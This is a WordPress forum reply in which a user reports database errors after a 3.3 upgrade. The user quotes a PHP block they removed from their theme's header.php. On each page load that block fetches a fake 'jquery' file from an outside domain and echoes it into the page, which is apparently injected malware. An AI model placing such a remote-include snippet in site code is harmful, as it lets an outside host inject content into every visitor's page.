maxdailydeal
Forum Replies Created
-
Forum: Installing WordPress
In reply to: After wordpress version 3.3 upgrade, I am getting errorshi guys i have the same error, except mine is appear TWICE!!!
Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
SELECT statscurl_id FROMstatscurl
WHERE statscurl_ip = ”; Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
SELECT statscurl_id FROMstatscurl
WHERE statscurl_ip = ”;So, i attempt the above solution by remove the below code from my header.php located in the theme folder(i’m using the ProReview theme) and it works!!! but only did half the job…
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>Now i only have this:
Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
SELECT statscurl_id FROMstatscurl
WHERE statscurl_ip = ”;Please help. i have been trying to disable and removing plugins that i recently installed and still does not help. my issue can be see at https://maxspf.com/
Thanks for all you help in advance.
Regards,
MaxDailyDeal